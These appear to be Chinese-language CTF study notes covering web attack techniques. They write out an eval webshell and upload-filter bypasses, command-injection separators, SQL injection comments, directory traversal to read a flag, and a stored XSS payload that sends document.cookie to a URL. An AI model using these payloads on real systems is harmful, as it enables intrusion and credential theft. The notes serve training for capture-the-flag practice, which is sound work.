补充
1、题目:描述:http://115.239.217.94:16695/ 考察选手对于eval木马、ls、cat命令的运用
解法:输入http://115.239.217.94:16695,出现@eval($_GET['xszx,然后http://115.239.217.94:16695/?xszx=system('ls'); ,然后输入http://115.239.217.94:16695/?xszx=system('ls …/…/…/…/…/…/…/…/…/…/…/…/'); 找到flag,之后输入http://115.239.217.94:16695/?xszx=system('cat …/…/…/…/…/…/…/…/…/…/…/…/flag');
ls找东西(查看当前目录下的文件)⇔dir
cat拿东西
…/回溯上一级目录
/ 下一级目录
?前面是文件,作用传参
2、补充:看ip是http://115.239.217.94:16695/?xszx=system('if');
图片:先下载下来,
扫端口:目录端口后台主机发现,router扫描端口,ip
Moba…,new sen,远程主机填域名,用户名root,比赛填真实端口(端口填的比真实端口多1,eg.真实是18896填18897),路径var/www/html,所有文件选定右键下载,D盾,所有文件拖到里面,删除
http://115.239.217.94:7991/main
php标签外是文件
3、文件上传:
先随便上传一个php文件,之后将上传的文件底下的图片拖到浏览器得到地址,中国菜刀,右键添加,SHELL木马地址,密码是GET或POST框内的东西,然后双击出现的东西,新建文档并命名后缀为php,在文档中编辑木马eg.<?php @eval[$_POST[cmd]);?> ,然后转为jpg文件上传,在上传同时抓包,将抓到的东西改为php,之后Forward。
补充:(传输前是前端校验,传输后是后端校验,抓包工具抓包时绕过了前端校验。图片码:图片中带的码,打开图片源代码,在其中加木马。
注:和php同等的有phptml、php3、php5,也可以用大小写混淆;
window三大特性:文本后缀名不能有空格、 “.” 、 “::$DATA"(数据流)
若上传文件后php被删除,则在抓到的包中改为pphphp;
文件包含绕过:115.239.217.94:1314/uploado/include.php?file uploads/3820240221201209.jpeg
load_file读取计算机内的文件
了解:%00截断、竞争条件绕过、.htaccess绕过、.user.ini绕过、二次渲染绕过
补充:自己写木马需要加上GIF89a
4、机器人协议:一个网站中有robots.txt,文件中有哪个可以爬,哪个不可以爬
5、SQL注入:“--+”表示注释
查看文件用type
补充:sql注入时间盲注
7、rce命令执行
- 分号:127.0.0.1;ls 执行完前面的命令后,又执行了后面一条命令,当前面的命令错误时,执行后面的命令
- |: ping 127.0.0.1|ls 不执行前面命令,只执行后面命令
- ||:ping 127.0.0.1||ls当前面的执行结果错误时,后面命令才会执行,当前面的命令正确时,后面不执行
- &:ping 127.0.0.1&ls执行完前面的命令后,又执行了后面一条命令,当前面的命令错误时,执行后面的命令
- &&:ping 127.0.0.1&&ls 前后都执行,若前面错,则后面不执行
8、如果输入的代码中POST被注释,则输入“ /POST ”
9、eval代码执行
system,shell_exec命令执行
whoami查看当前有效用户命令
calc计算器
shutdown关机
10、进入后台admin.php
11、xss:先找有没有可以输入的地方,之后输入<script>alert('1')</script>,若没有弹窗,则把源代码语句闭合。
<script>document.location="网址"<script>表示要跳转的网站
存储型xss:<script>document.location="http://127.0.0.1/cookie.php?cookie="+document.cookie;</script>
12、Pwn:打开nc64.exe 网址(空格)端口
cat flag
13、逆向:打开IDA,Shift+f12查看字符串 复制map的字符串,然后新建文档将字符串放到里面
14、Ctrl+u/网页前加view-source观看源代码
15、查询是否有SQL注入:inurl:php?id=1
三、
信息收集:eg. http://www.beidu.com 其中beidu.com是主域名,www是子域名,也是二级域名
四、对象序列化
序列化函数:serialize(变量)
eg.<?php
$a='test';
echo '序列化:';
$b=serialize($a);
print_r($b);
?>
输出:序列化s:4:test(其中s表示string,4表示长度,o表示类,a表示数组)
eval在php中是一个执行代码命令的高危函数

浙公网安备 33010602011771号